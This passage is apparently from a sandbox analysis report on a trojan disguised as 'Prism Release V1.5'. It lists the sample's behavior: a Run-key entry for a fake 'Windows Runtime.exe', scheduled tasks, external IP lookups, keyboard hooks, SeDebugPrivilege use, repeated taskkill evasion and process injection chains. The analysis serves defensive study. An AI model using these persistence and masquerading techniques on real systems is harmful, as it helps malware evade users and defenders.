Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 948 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 948 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 948 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 948 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 3116 wrote to memory of 2564 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe
PID 3116 wrote to memory of 2564 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe
PID 4492 wrote to memory of 4276 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4276 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 436 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 436 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 3528 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 3528 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2756 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 2756 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 1188 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 4492 wrote to memory of 1188 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 4492 wrote to memory of 1220 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\cffckp.exe
PID 4492 wrote to memory of 1220 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\cffckp.exe
PID 1220 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cffckp.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 1220 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cffckp.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 800 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 800 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe
PID 800 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 800 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5040 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2760 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5040 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 464 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5040 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4380 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5040 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 5040 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 2196 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 5040 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 932 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 932 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 2832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 800 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 800 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\system32\cmd.exe
PID 5040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 5040 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe C:\Windows\System32\Conhost.exe
PID 2560 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2560 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

